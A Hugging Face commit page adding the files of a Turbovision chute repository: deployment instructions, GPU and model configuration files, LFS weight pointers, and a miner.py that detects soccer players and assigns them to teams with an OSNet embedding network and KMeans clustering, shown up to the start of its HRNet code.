Duplicate from SuperBitDev/turbo2

Browse files

Co-authored-by: Evan Low <SuperBitDev@users.noreply.huggingface.co>

Files changed (8) hide show

.gitattributes +36 -0
README.md +92 -0
chute_config.yml +29 -0
hrnetv2_w48.yaml +35 -0
keypoint_detect.pt +3 -0
miner.py +1697 -0
osnet_model.pth.tar-100 +3 -0
player_detect.pt +3 -0

.gitattributes ADDED Viewed

	@@ -0,0 +1,36 @@

+*.7z filter=lfs diff=lfs merge=lfs -text
+*.arrow filter=lfs diff=lfs merge=lfs -text
+*.bin filter=lfs diff=lfs merge=lfs -text
+*.bz2 filter=lfs diff=lfs merge=lfs -text
+*.ckpt filter=lfs diff=lfs merge=lfs -text
+*.ftz filter=lfs diff=lfs merge=lfs -text
+*.gz filter=lfs diff=lfs merge=lfs -text
+*.h5 filter=lfs diff=lfs merge=lfs -text
+*.joblib filter=lfs diff=lfs merge=lfs -text
+*.lfs.* filter=lfs diff=lfs merge=lfs -text
+*.mlmodel filter=lfs diff=lfs merge=lfs -text
+*.model filter=lfs diff=lfs merge=lfs -text
+*.msgpack filter=lfs diff=lfs merge=lfs -text
+*.npy filter=lfs diff=lfs merge=lfs -text
+*.npz filter=lfs diff=lfs merge=lfs -text
+*.onnx filter=lfs diff=lfs merge=lfs -text
+*.ot filter=lfs diff=lfs merge=lfs -text
+*.parquet filter=lfs diff=lfs merge=lfs -text
+*.pb filter=lfs diff=lfs merge=lfs -text
+*.pickle filter=lfs diff=lfs merge=lfs -text
+*.pkl filter=lfs diff=lfs merge=lfs -text
+*.pt filter=lfs diff=lfs merge=lfs -text
+*.pth filter=lfs diff=lfs merge=lfs -text
+*.rar filter=lfs diff=lfs merge=lfs -text
+*.safetensors filter=lfs diff=lfs merge=lfs -text
+saved_model/**/* filter=lfs diff=lfs merge=lfs -text
+*.tar.* filter=lfs diff=lfs merge=lfs -text
+*.tar filter=lfs diff=lfs merge=lfs -text
+*.tflite filter=lfs diff=lfs merge=lfs -text
+*.tgz filter=lfs diff=lfs merge=lfs -text
+*.wasm filter=lfs diff=lfs merge=lfs -text
+*.xz filter=lfs diff=lfs merge=lfs -text
+*.zip filter=lfs diff=lfs merge=lfs -text
+*.zst filter=lfs diff=lfs merge=lfs -text
+*tfevents* filter=lfs diff=lfs merge=lfs -text
+osnet_model.pth.tar-100 filter=lfs diff=lfs merge=lfs -text

README.md ADDED Viewed

	@@ -0,0 +1,92 @@

+# 🚀 Example Chute for Turbovision 🪂
+This repository demonstrates how to deploy a **Chute** via the **Turbovision CLI**, hosted on **Hugging Face Hub**.
+It serves as a minimal example showcasing the required structure and workflow for integrating machine learning models, preprocessing, and orchestration into a reproducible Chute environment.
+## Repository Structure
+The following two files **must be present** (in their current locations) for a successful deployment — their content can be modified as needed:
+| File | Purpose |
+|------|----------|
+| `miner.py` | Defines the ML model type(s), orchestration, and all pre/postprocessing logic. |
+| `config.yml` | Specifies machine configuration (e.g., GPU type, memory, environment variables). |
+Other files — e.g., model weights, utility scripts, or dependencies — are **optional** and can be included as needed for your model. Note: Any required assets must be defined or contained **within this repo**, which is fully open-source, since all network-related operations (downloading challenge data, weights, etc.) are disabled **inside the Chute**
+## Overview
+Below is a high-level diagram showing the interaction between Huggingface, Chutes and Turbovision:
+![](../images/miner.png)
+## Local Testing
+After editing the `config.yml` and `miner.py` and saving it into your Huggingface Repo, you will want to test it works locally.
+1. Copy the file `scorevision/chute_tmeplate/turbovision_chute.py.j2` as a python file called `my_chute.py` and fill in the missing variables:
+```python
+HF_REPO_NAME = "{{ huggingface_repository_name }}"
+HF_REPO_REVISION = "{{ huggingface_repository_revision }}"
+CHUTES_USERNAME = "{{ chute_username }}"
+CHUTE_NAME = "{{ chute_name }}"
+```
+2. Run the following command to build the chute locally (Caution: there are known issues with the docker location when running this on a mac)
+```bash
+chutes build my_chute:chute --local --public
+```
+3. Run the name of the docker image just built (i.e. `CHUTE_NAME`) and enter it
+```bash
+docker run -p 8000:8000 -e CHUTES_EXECUTION_CONTEXT=REMOTE -it <image-name> /bin/bash
+```
+4. Run the file from within the container
+```bash
+chutes run my_chute:chute --dev --debug
+```
+5. In another terminal, test the local endpoints to ensure there are no bugs
+```bash
+curl -X POST http://localhost:8000/health -d '{}'
+curl -X POST http://localhost:8000/predict -d '{"url": "https://scoredata.me/2025_03_14/35ae7a/h1_0f2ca0.mp4","meta": {}}'
+```
+## Live Testing
+1. If you have any chute with the same name (ie from a previous deployment), ensure you delete that first (or you will get an error when trying to build).
+```bash
+chutes chutes list
+```
+Take note of the chute id that you wish to delete (if any)
+```bash
+chutes chutes delete <chute-id>
+```
+You should also delete its associated image
+```bash
+chutes images list
+```
+Take note of the chute image id
+```bash
+chutes images delete <chute-image-id>
+```
+2. Use Turbovision's CLI to build, deploy and commit on-chain (Note: you can skip the on-chain commit using `--no-commit`.  You can also specify a past huggingface revision to point to using `--revision` and/or the local files you want to upload to your huggingface repo using `--model-path`)
+```bash
+sv -vv push
+```
+3. When completed, warm up the chute (if its cold 🧊). (You can confirm its status using `chutes chutes list` or `chutes chutes get <chute-id>` if you already know its id). Note: Warming up can sometimes take a while but if the chute runs without errors (should be if you've tested locally first) and there are sufficient nodes (i.e. machines) available matching the `config.yml` you specified, the chute should become hot 🔥!
+```bash
+chutes warmup <chute-id>
+```
+4. Test the chute's endpoints
+```bash
+curl -X POST https://<YOUR-CHUTE-SLUG>.chutes.ai/health -d '{}' -H "Authorization: Bearer $CHUTES_API_KEY"
+curl -X POST https://<YOUR-CHUTE-SLUG>.chutes.ai/predict -d '{"url": "https://scoredata.me/2025_03_14/35ae7a/h1_0f2ca0.mp4","meta": {}}' -H "Authorization: Bearer $CHUTES_API_KEY"
+```
+5. Test what your chute would get on a validator (this also applies any validation/integrity checks which may fail if you did not use the Turbovision CLI above to deploy the chute)
+```bash
+sv -vv run-once
+```

chute_config.yml ADDED Viewed

	@@ -0,0 +1,29 @@

+Image:
+  from_base: parachutes/python:3.12
+  run_command:
+    - pip install --upgrade setuptools wheel
+    - pip install --index-url https://download.pytorch.org/whl/cu128 torch torchvision
+    - pip install "ultralytics==8.3.222" "opencv-python-headless" "numpy" "pydantic"
+    - pip install scikit-learn
+    - pip install onnxruntime-gpu
+  set_workdir: /app
+  readme: "Image for chutes"
+NodeSelector:
+  gpu_count: 1
+  min_vram_gb_per_gpu: 24
+  min_memory_gb: 32
+  min_cpu_count: 32
+  exclude:
+    - "5090"
+    - b200
+    - h200
+    - mi300x
+Chute:
+  timeout_seconds: 900
+  concurrency: 4
+  max_instances: 5
+  scaling_threshold: 0.3
+  shutdown_after_seconds: 600000

hrnetv2_w48.yaml ADDED Viewed

	@@ -0,0 +1,35 @@

+MODEL:
+  IMAGE_SIZE: [960, 540]
+  NUM_JOINTS: 58
+  PRETRAIN: ''
+  EXTRA:
+    FINAL_CONV_KERNEL: 1
+    STAGE1:
+      NUM_MODULES: 1
+      NUM_BRANCHES: 1
+      BLOCK: BOTTLENECK
+      NUM_BLOCKS: [4]
+      NUM_CHANNELS: [64]
+      FUSE_METHOD: SUM
+    STAGE2:
+      NUM_MODULES: 1
+      NUM_BRANCHES: 2
+      BLOCK: BASIC
+      NUM_BLOCKS: [4, 4]
+      NUM_CHANNELS: [48, 96]
+      FUSE_METHOD: SUM
+    STAGE3:
+      NUM_MODULES: 4
+      NUM_BRANCHES: 3
+      BLOCK: BASIC
+      NUM_BLOCKS: [4, 4, 4]
+      NUM_CHANNELS: [48, 96, 192]
+      FUSE_METHOD: SUM
+    STAGE4:
+      NUM_MODULES: 3
+      NUM_BRANCHES: 4
+      BLOCK: BASIC
+      NUM_BLOCKS: [4, 4, 4, 4]
+      NUM_CHANNELS: [48, 96, 192, 384]
+      FUSE_METHOD: SUM

keypoint_detect.pt ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:7ea78fa76aaf94976a8eca428d6e3c59697a93430cba1a4603e20284b61f5113
+size 264964645

miner.py ADDED Viewed

	@@ -0,0 +1,1697 @@

+# FULL miner.py (self-contained)
+# -------------------------------------------------------------
+import time
+import cv2
+import torch
+import numpy as np
+from pathlib import Path
+from typing import Iterable, Generator, List, TypeVar, Tuple
+from numpy import ndarray
+from pydantic import BaseModel
+from ultralytics import YOLO
+import datetime
+# ------------------------------
+# DATA MODELS
+# ------------------------------
+class BoundingBox(BaseModel):
+    x1: int
+    y1: int
+    x2: int
+    y2: int
+    cls_id: int
+    conf: float
+    track_id: int | None = None
+class TVFrameResult(BaseModel):
+    frame_id: int
+    boxes: list[BoundingBox]
+    keypoints: list[tuple[int, int]]
+# ------------------------------
+# BATCH UTILITY
+# ------------------------------
+V = TypeVar("V")
+kp_threshold = 0.3
+def create_batches(sequence: Iterable[V], batch_size: int) -> Generator[List[V], None, None]:
+    batch_size = max(batch_size, 1)
+    current_batch = []
+    for element in sequence:
+        if len(current_batch) == batch_size:
+            yield current_batch
+            current_batch = []
+        current_batch.append(element)
+    if current_batch:
+        yield current_batch
+# class TeamClassifier:
+#     def __init__(self):
+#         self.color_refs = []
+#         self.fitted = False
+#     def _center_crop(self, crop: np.ndarray) -> np.ndarray:
+#         h, w = crop.shape[:2]
+#         return crop[int(h*0.2):int(h*0.5), int(w*0.2):int(w*0.8)]
+#     def _extract_color(self, crop: np.ndarray) -> float:
+#         if crop is None or crop.size == 0:
+#             return 0.0
+#         crop = self._center_crop(crop)
+#         hsv = cv2.cvtColor(crop, cv2.COLOR_BGR2HSV)
+#         return float(hsv[:, :, 0].mean())
+#     def fit(self, crops: list[np.ndarray]):
+#         if len(crops) < 6:
+#             return
+#         hs = np.array([self._extract_color(c) for c in crops])
+#         thresh = np.median(hs)
+#         self.color_refs = [(h, 0 if h < thresh else 1) for h in hs]
+#         self.fitted = True
+#     def predict(self, crops: list[np.ndarray]) -> np.ndarray:
+#         if not self.fitted:
+#             self.fit(crops)
+#         team_ids = []
+#         for crop in crops:
+#             h = self._extract_color(crop)
+#             if not self.color_refs:
+#                 team_ids.append(0)
+#                 continue
+#             ref_h, ref_team = min(self.color_refs, key=lambda t: abs(t[0] - h))
+#             team_ids.append(ref_team)
+#         return np.array(team_ids, dtype=int)
+# ------------------------------
+# TEAM CLASSIFIER
+# ------------------------------
+##########
+# OSNET
+##########
+from torch import nn
+from torch.nn import functional as F
+from sklearn.cluster import KMeans
+from PIL import Image
+from collections import defaultdict
+_OSNET_MODEL = None
+team_classifier_path = None
+BALL_ID = 0
+GK_ID = 1
+PLAYER_ID = 2
+REF_ID = 3
+# Team assignment: 6 = team 1, 7 = team 2; 8 = unassigned (outlier, e.g. misdetected referee/GK)
+TEAM_1_ID = 6
+TEAM_2_ID = 7
+pretrained_urls = {
+    'osnet_x1_0':
+    'https://drive.google.com/uc?id=1LaG1EJpHrxdAxKnSCJ_i0u-nbxSAeiFY',
+}
+class ConvLayer(nn.Module):
+    """Convolution layer (conv + bn + relu)."""
+    def __init__(
+        self,
+        in_channels,
+        out_channels,
+        kernel_size,
+        stride=1,
+        padding=0,
+        groups=1,
+        IN=False
+    ):
+        super(ConvLayer, self).__init__()
+        self.conv = nn.Conv2d(
+            in_channels,
+            out_channels,
+            kernel_size,
+            stride=stride,
+            padding=padding,
+            bias=False,
+            groups=groups
+        )
+        if IN:
+            self.bn = nn.InstanceNorm2d(out_channels, affine=True)
+        else:
+            self.bn = nn.BatchNorm2d(out_channels)
+        self.relu = nn.ReLU(inplace=True)
+    def forward(self, x):
+        x = self.conv(x)
+        x = self.bn(x)
+        x = self.relu(x)
+        return x
+class Conv1x1(nn.Module):
+    """1x1 convolution + bn + relu."""
+    def __init__(self, in_channels, out_channels, stride=1, groups=1):
+        super(Conv1x1, self).__init__()
+        self.conv = nn.Conv2d(
+            in_channels,
+            out_channels,
+            1,
+            stride=stride,
+            padding=0,
+            bias=False,
+            groups=groups
+        )
+        self.bn = nn.BatchNorm2d(out_channels)
+        self.relu = nn.ReLU(inplace=True)
+    def forward(self, x):
+        x = self.conv(x)
+        x = self.bn(x)
+        x = self.relu(x)
+        return x
+class Conv1x1Linear(nn.Module):
+    """1x1 convolution + bn (w/o non-linearity)."""
+    def __init__(self, in_channels, out_channels, stride=1):
+        super(Conv1x1Linear, self).__init__()
+        self.conv = nn.Conv2d(
+            in_channels, out_channels, 1, stride=stride, padding=0, bias=False
+        )
+        self.bn = nn.BatchNorm2d(out_channels)
+    def forward(self, x):
+        x = self.conv(x)
+        x = self.bn(x)
+        return x
+class Conv3x3(nn.Module):
+    """3x3 convolution + bn + relu."""
+    def __init__(self, in_channels, out_channels, stride=1, groups=1):
+        super(Conv3x3, self).__init__()
+        self.conv = nn.Conv2d(
+            in_channels,
+            out_channels,
+            3,
+            stride=stride,
+            padding=1,
+            bias=False,
+            groups=groups
+        )
+        self.bn = nn.BatchNorm2d(out_channels)
+        self.relu = nn.ReLU(inplace=True)
+    def forward(self, x):
+        x = self.conv(x)
+        x = self.bn(x)
+        x = self.relu(x)
+        return x
+class LightConv3x3(nn.Module):
+    """Lightweight 3x3 convolution.
+    1x1 (linear) + dw 3x3 (nonlinear).
+    """
+    def __init__(self, in_channels, out_channels):
+        super(LightConv3x3, self).__init__()
+        self.conv1 = nn.Conv2d(
+            in_channels, out_channels, 1, stride=1, padding=0, bias=False
+        )
+        self.conv2 = nn.Conv2d(
+            out_channels,
+            out_channels,
+            3,
+            stride=1,
+            padding=1,
+            bias=False,
+            groups=out_channels
+        )
+        self.bn = nn.BatchNorm2d(out_channels)
+        self.relu = nn.ReLU(inplace=True)
+    def forward(self, x):
+        x = self.conv1(x)
+        x = self.conv2(x)
+        x = self.bn(x)
+        x = self.relu(x)
+        return x
+##########
+# Building blocks for omni-scale feature learning
+##########
+class ChannelGate(nn.Module):
+    """A mini-network that generates channel-wise gates conditioned on input tensor."""
+    def __init__(
+        self,
+        in_channels,
+        num_gates=None,
+        return_gates=False,
+        gate_activation='sigmoid',
+        reduction=16,
+        layer_norm=False
+    ):
+        super(ChannelGate, self).__init__()
+        if num_gates is None:
+            num_gates = in_channels
+        self.return_gates = return_gates
+        self.global_avgpool = nn.AdaptiveAvgPool2d(1)
+        self.fc1 = nn.Conv2d(
+            in_channels,
+            in_channels // reduction,
+            kernel_size=1,
+            bias=True,
+            padding=0
+        )
+        self.norm1 = None
+        if layer_norm:
+            self.norm1 = nn.LayerNorm((in_channels // reduction, 1, 1))
+        self.relu = nn.ReLU(inplace=True)
+        self.fc2 = nn.Conv2d(
+            in_channels // reduction,
+            num_gates,
+            kernel_size=1,
+            bias=True,
+            padding=0
+        )
+        if gate_activation == 'sigmoid':
+            self.gate_activation = nn.Sigmoid()
+        elif gate_activation == 'relu':
+            self.gate_activation = nn.ReLU(inplace=True)
+        elif gate_activation == 'linear':
+            self.gate_activation = None
+        else:
+            raise RuntimeError(
+                "Unknown gate activation: {}".format(gate_activation)
+            )
+    def forward(self, x):
+        input = x
+        x = self.global_avgpool(x)
+        x = self.fc1(x)
+        if self.norm1 is not None:
+            x = self.norm1(x)
+        x = self.relu(x)
+        x = self.fc2(x)
+        if self.gate_activation is not None:
+            x = self.gate_activation(x)
+        if self.return_gates:
+            return x
+        return input * x
+class OSBlock(nn.Module):
+    """Omni-scale feature learning block."""
+    def __init__(
+        self,
+        in_channels,
+        out_channels,
+        IN=False,
+        bottleneck_reduction=4,
+        **kwargs
+    ):
+        super(OSBlock, self).__init__()
+        mid_channels = out_channels // bottleneck_reduction
+        self.conv1 = Conv1x1(in_channels, mid_channels)
+        self.conv2a = LightConv3x3(mid_channels, mid_channels)
+        self.conv2b = nn.Sequential(
+            LightConv3x3(mid_channels, mid_channels),
+            LightConv3x3(mid_channels, mid_channels),
+        )
+        self.conv2c = nn.Sequential(
+            LightConv3x3(mid_channels, mid_channels),
+            LightConv3x3(mid_channels, mid_channels),
+            LightConv3x3(mid_channels, mid_channels),
+        )
+        self.conv2d = nn.Sequential(
+            LightConv3x3(mid_channels, mid_channels),
+            LightConv3x3(mid_channels, mid_channels),
+            LightConv3x3(mid_channels, mid_channels),
+            LightConv3x3(mid_channels, mid_channels),
+        )
+        self.gate = ChannelGate(mid_channels)
+        self.conv3 = Conv1x1Linear(mid_channels, out_channels)
+        self.downsample = None
+        if in_channels != out_channels:
+            self.downsample = Conv1x1Linear(in_channels, out_channels)
+        self.IN = None
+        if IN:
+            self.IN = nn.InstanceNorm2d(out_channels, affine=True)
+    def forward(self, x):
+        identity = x
+        x1 = self.conv1(x)
+        x2a = self.conv2a(x1)
+        x2b = self.conv2b(x1)
+        x2c = self.conv2c(x1)
+        x2d = self.conv2d(x1)
+        x2 = self.gate(x2a) + self.gate(x2b) + self.gate(x2c) + self.gate(x2d)
+        x3 = self.conv3(x2)
+        if self.downsample is not None:
+            identity = self.downsample(identity)
+        out = x3 + identity
+        if self.IN is not None:
+            out = self.IN(out)
+        return F.relu(out)
+##########
+# Network architecture
+##########
+class OSNet(nn.Module):
+    """Omni-Scale Network.
+    Reference:
+        - Zhou et al. Omni-Scale Feature Learning for Person Re-Identification. ICCV, 2019.
+        - Zhou et al. Learning Generalisable Omni-Scale Representations
+          for Person Re-Identification. TPAMI, 2021.
+    """
+    def __init__(
+        self,
+        num_classes,
+        blocks,
+        layers,
+        channels,
+        feature_dim=512,
+        loss='softmax',
+        IN=False,
+        **kwargs
+    ):
+        super(OSNet, self).__init__()
+        num_blocks = len(blocks)
+        assert num_blocks == len(layers)
+        assert num_blocks == len(channels) - 1
+        self.loss = loss
+        self.feature_dim = feature_dim
+        # convolutional backbone
+        self.conv1 = ConvLayer(3, channels[0], 7, stride=2, padding=3, IN=IN)
+        self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
+        self.conv2 = self._make_layer(
+            blocks[0],
+            layers[0],
+            channels[0],
+            channels[1],
+            reduce_spatial_size=True,
+            IN=IN
+        )
+        self.conv3 = self._make_layer(
+            blocks[1],
+            layers[1],
+            channels[1],
+            channels[2],
+            reduce_spatial_size=True
+        )
+        self.conv4 = self._make_layer(
+            blocks[2],
+            layers[2],
+            channels[2],
+            channels[3],
+            reduce_spatial_size=False
+        )
+        self.conv5 = Conv1x1(channels[3], channels[3])
+        self.global_avgpool = nn.AdaptiveAvgPool2d(1)
+        # fully connected layer
+        self.fc = self._construct_fc_layer(
+            self.feature_dim, channels[3], dropout_p=None
+        )
+        # identity classification layer
+        self.classifier = nn.Linear(self.feature_dim, num_classes)
+        self._init_params()
+    def _make_layer(
+        self,
+        block,
+        layer,
+        in_channels,
+        out_channels,
+        reduce_spatial_size,
+        IN=False
+    ):
+        layers = []
+        layers.append(block(in_channels, out_channels, IN=IN))
+        for i in range(1, layer):
+            layers.append(block(out_channels, out_channels, IN=IN))
+        if reduce_spatial_size:
+            layers.append(
+                nn.Sequential(
+                    Conv1x1(out_channels, out_channels),
+                    nn.AvgPool2d(2, stride=2)
+                )
+            )
+        return nn.Sequential(*layers)
+    def _construct_fc_layer(self, fc_dims, input_dim, dropout_p=None):
+        if fc_dims is None or fc_dims < 0:
+            self.feature_dim = input_dim
+            return None
+        if isinstance(fc_dims, int):
+            fc_dims = [fc_dims]
+        layers = []
+        for dim in fc_dims:
+            layers.append(nn.Linear(input_dim, dim))
+            layers.append(nn.BatchNorm1d(dim))
+            layers.append(nn.ReLU(inplace=True))
+            if dropout_p is not None:
+                layers.append(nn.Dropout(p=dropout_p))
+            input_dim = dim
+        self.feature_dim = fc_dims[-1]
+        return nn.Sequential(*layers)
+    def _init_params(self):
+        for m in self.modules():
+            if isinstance(m, nn.Conv2d):
+                nn.init.kaiming_normal_(
+                    m.weight, mode='fan_out', nonlinearity='relu'
+                )
+                if m.bias is not None:
+                    nn.init.constant_(m.bias, 0)
+            elif isinstance(m, nn.BatchNorm2d):
+                nn.init.constant_(m.weight, 1)
+                nn.init.constant_(m.bias, 0)
+            elif isinstance(m, nn.BatchNorm1d):
+                nn.init.constant_(m.weight, 1)
+                nn.init.constant_(m.bias, 0)
+            elif isinstance(m, nn.Linear):
+                nn.init.normal_(m.weight, 0, 0.01)
+                if m.bias is not None:
+                    nn.init.constant_(m.bias, 0)
+    def featuremaps(self, x):
+        x = self.conv1(x)
+        x = self.maxpool(x)
+        x = self.conv2(x)
+        x = self.conv3(x)
+        x = self.conv4(x)
+        x = self.conv5(x)
+        return x
+    def forward(self, x, return_featuremaps=False):
+        x = self.featuremaps(x)
+        if return_featuremaps:
+            return x
+        v = self.global_avgpool(x)
+        v = v.view(v.size(0), -1)
+        if self.fc is not None:
+            v = self.fc(v)
+        if not self.training:
+            return v
+        y = self.classifier(v)
+        if self.loss == 'softmax':
+            return y
+        elif self.loss == 'triplet':
+            return y, v
+        else:
+            raise KeyError("Unsupported loss: {}".format(self.loss))
+def init_pretrained_weights(model, key=''):
+    """Initializes model with pretrained weights.
+    Layers that don't match with pretrained layers in name or size are kept unchanged.
+    """
+    import os
+    import errno
+    import gdown
+    from collections import OrderedDict
+    def _get_torch_home():
+        ENV_TORCH_HOME = 'TORCH_HOME'
+        ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
+        DEFAULT_CACHE_DIR = '~/.cache'
+        torch_home = os.path.expanduser(
+            os.getenv(
+                ENV_TORCH_HOME,
+                os.path.join(
+                    os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch'
+                )
+            )
+        )
+        return torch_home
+    torch_home = _get_torch_home()
+    model_dir = os.path.join(torch_home, 'checkpoints')
+    try:
+        os.makedirs(model_dir)
+    except OSError as e:
+        if e.errno == errno.EEXIST:
+            # Directory already exists, ignore.
+            pass
+        else:
+            # Unexpected OSError, re-raise.
+            raise
+    filename = key + '_imagenet.pth'
+    cached_file = os.path.join(model_dir, filename)
+    if not os.path.exists(cached_file):
+        gdown.download(pretrained_urls[key], cached_file, quiet=False)
+    state_dict = torch.load(cached_file)
+    model_dict = model.state_dict()
+    new_state_dict = OrderedDict()
+    matched_layers, discarded_layers = [], []
+    for k, v in state_dict.items():
+        if k.startswith('module.'):
+            k = k[7:] # discard module.
+        if k in model_dict and model_dict[k].size() == v.size():
+            new_state_dict[k] = v
+            matched_layers.append(k)
+        else:
+            discarded_layers.append(k)
+    model_dict.update(new_state_dict)
+    model.load_state_dict(model_dict)
+    if len(matched_layers) == 0:
+        print(
+            'The pretrained weights from "{}" cannot be loaded, '
+            'please check the key names manually '
+            '(** ignored and continue **)'.format(cached_file)
+        )
+    else:
+        print(
+            'Successfully loaded imagenet pretrained weights from "{}"'.
+            format(cached_file)
+        )
+        if len(discarded_layers) > 0:
+            print(
+                '** The following layers are discarded '
+                'due to unmatched keys or layer size: {}'.
+                format(discarded_layers)
+            )
+##########
+# Instantiation
+##########
+def osnet_x1_0(num_classes=1000, pretrained=True, loss='softmax', **kwargs):
+    # standard size (width x1.0)
+    model = OSNet(
+        num_classes,
+        blocks=[OSBlock, OSBlock, OSBlock],
+        layers=[2, 2, 2],
+        channels=[64, 256, 384, 512],
+        loss=loss,
+        **kwargs
+    )
+    # if pretrained:
+    #     init_pretrained_weights(model, key='osnet_x1_0')
+    return model
+from typing import Generator, Iterable
+import torchvision.transforms as T
+from collections import OrderedDict
+import os.path as osp
+def load_checkpoint(fpath):
+    fpath = osp.abspath(osp.expanduser(fpath))
+    map_location = None if torch.cuda.is_available() else 'cpu'
+    # weights_only=False allows checkpoints that contain numpy/other objects (e.g. model.pth.tar-100)
+    checkpoint = torch.load(fpath, map_location=map_location, weights_only=False)
+    return checkpoint
+def load_pretrained_weights(model, weight_path):
+    checkpoint = load_checkpoint(weight_path)
+    if 'state_dict' in checkpoint:
+        state_dict = checkpoint['state_dict']
+    else:
+        state_dict = checkpoint
+    model_dict = model.state_dict()
+    new_state_dict = OrderedDict()
+    matched_layers, discarded_layers = ([], [])
+    for k, v in state_dict.items():
+        if k.startswith('module.'):
+            k = k[7:]
+        if k in model_dict and model_dict[k].size() == v.size():
+            new_state_dict[k] = v
+            matched_layers.append(k)
+        else:
+            discarded_layers.append(k)
+    model_dict.update(new_state_dict)
+    model.load_state_dict(model_dict)
+def load_osnet(device="cuda", weight_path=None):
+    """Build osnet_x1_0 and load weights from model.pth.tar-100 via load_pretrained_weights."""
+    model = osnet_x1_0(num_classes=1, loss='softmax', pretrained=False, use_gpu=device == 'cuda')
+    # if weight_path is None:
+    #     weight_path = Path(__file__).resolve().parent / "model.pth.tar-100"
+    weight_path = Path(weight_path)
+    if weight_path.exists():
+        load_pretrained_weights(model, str(weight_path))
+    model.eval()
+    model.to(device)
+    return model
+def filter_player_boxes(
+    boxes: List[BoundingBox],
+    min_area: int = 1500
+) -> List[BoundingBox]:
+    players = []
+    for b in boxes:
+        if b.cls_id != 2:   # only players
+            continue
+        # area = (b.x2 - b.x1) * (b.y2 - b.y1)
+        # if area < min_area:
+        #     continue
+        players.append(b)
+    return players
+# OSNet preprocess (same as team_cluster: Resize, ToTensor, ImageNet normalize)
+OSNET_IMAGE_SIZE = (64, 32)  # (height, width)
+OSNET_PREPROCESS = T.Compose([
+    T.Resize(OSNET_IMAGE_SIZE),
+    T.ToTensor(),
+    T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
+])
+def crop_upper_body(frame: np.ndarray, box: BoundingBox) -> np.ndarray:
+    # h = box.y2 - box.y1
+    # y2 = box.y1 + int(0.6 * h)
+    return frame[
+        max(0, box.y1):max(0, box.y2),
+        max(0, box.x1):max(0, box.x2)
+    ]
+def preprocess_osnet(crop: np.ndarray) -> torch.Tensor:
+    """BGR crop -> RGB PIL -> Resize, ToTensor, ImageNet Normalize (same as team_cluster)."""
+    rgb = cv2.cvtColor(crop, cv2.COLOR_BGR2RGB)
+    pil = Image.fromarray(rgb)
+    return OSNET_PREPROCESS(pil)
+@torch.no_grad()
+def extract_osnet_embeddings(
+    frames: List[np.ndarray],
+    # batch_boxes: List[List[BoundingBox]],
+    batch_boxes: dict[int, List[BoundingBox]],
+    device="cuda"
+) -> Tuple[np.ndarray, List[BoundingBox]]:
+    crops = []
+    meta = []
+    for frame, frame_index, boxes in zip(frames, batch_boxes.keys(), batch_boxes.values()):
+        players = filter_player_boxes(boxes)
+        for box in players:
+            crop = crop_upper_body(frame, box)
+            if crop.size == 0:
+                continue
+            crops.append(preprocess_osnet(crop))
+            meta.append(box)
+    if not crops:
+        return None, None
+    batch = torch.stack(crops).to(device)
+    with torch.no_grad():  # Inference mode saves ~20-30%
+        batch = batch.float().to(device)
+        embeddings = _OSNET_MODEL(batch)     # (N, 256)
+    del batch
+    torch.cuda.empty_cache()
+    embeddings = embeddings.cpu().numpy()
+    # embeddings /= np.linalg.norm(embeddings, axis=1, keepdims=True)
+    return embeddings, meta
+def aggregate_by_track(
+    embeddings: np.ndarray,
+    meta: List[BoundingBox]
+):
+    track_map = defaultdict(list)
+    box_map = {}
+    for emb, box in zip(embeddings, meta):
+        key = box.track_id if box.track_id is not None else id(box)
+        track_map[key].append(emb)
+        box_map[key] = box
+    agg_embeddings = []
+    agg_boxes = []
+    for key, embs in track_map.items():
+        mean_emb = np.mean(embs, axis=0)
+        mean_emb /= np.linalg.norm(mean_emb)
+        agg_embeddings.append(mean_emb)
+        agg_boxes.append(box_map[key])
+    return np.array(agg_embeddings), agg_boxes
+def cluster_teams(embeddings: np.ndarray):
+    if len(embeddings) < 2:
+        return None
+    kmeans = KMeans(n_clusters=2, n_init = 2, random_state=42)
+    return kmeans.fit_predict(embeddings)
+def update_team_ids(
+    boxes: List[BoundingBox],
+    labels: np.ndarray
+):
+    for box, label in zip(boxes, labels):
+        box.cls_id = TEAM_1_ID if label == 0 else TEAM_2_ID
+def classify_teams_batch(
+    frames: List[np.ndarray],
+    # batch_boxes: List[List[BoundingBox]],
+    batch_boxes: dict[int, List[BoundingBox]],
+    device="cuda"
+):
+    # Fallback: OSNet embeddings + aggregate by track + KMeans
+    embeddings, meta = extract_osnet_embeddings(
+        frames, batch_boxes, device
+    )
+    if embeddings is None:
+        return
+    embeddings, agg_boxes = aggregate_by_track(embeddings, meta)
+    n = len(embeddings)
+    if n == 0:
+        return
+    if n == 1:
+        agg_boxes[0].cls_id = TEAM_1_ID
+        return
+    kmeans = KMeans(n_clusters=2, n_init=2, random_state=42)
+    kmeans.fit(embeddings)
+    centroids = kmeans.cluster_centers_  # (2, dim)
+    # print("Clusters' centers:")
+    # for i, c in enumerate(centroids):
+    #     print(f"  cluster_{i}: shape={c.shape}, norm={np.linalg.norm(c):.4f}, mean={np.mean(c):.4f}")
+    c0, c1 = centroids[0], centroids[1]
+    norm_0 = np.linalg.norm(c0)
+    norm_1 = np.linalg.norm(c1)
+    # Similarity (cosine), distance (L2), square error (SSE) between the two centers
+    similarity = np.dot(c0, c1) / (norm_0 * norm_1 + 1e-12)
+    distance = np.linalg.norm(c0 - c1)
+    square_error = np.sum((c0 - c1) ** 2)
+    # print(f"  Between centers: similarity(cosine)={similarity:.4f}, distance(L2)={distance:.4f}, square_error(SSE)={square_error:.4f}")
+    if similarity > 0.95:
+        # Centers too similar: treat as one cluster (all same team)
+        for b in agg_boxes:
+            b.cls_id = TEAM_1_ID
+        # print("  Similarity > 0.95: using single cluster (all assigned to team 1).")
+        return
+    # If cluster_centers_[0] > cluster_centers_[1] then team A = cluster 0, else team B = cluster 0 (swap)
+    if norm_0 <= norm_1:
+        kmeans.labels_ = 1 - kmeans.labels_
+    update_team_ids(agg_boxes, kmeans.labels_)
+# ==============================================================
+# 🔥 HRNET IMPLEMENTATION (embedded instead of importing)
+# ==============================================================
+# import torch.nn as nn
+# import torch.nn.functional as F
+import yaml
+BatchNorm2d = nn.BatchNorm2d
+BN_MOMENTUM = 0.1
+def conv3x3(in_planes, out_planes, stride=1):
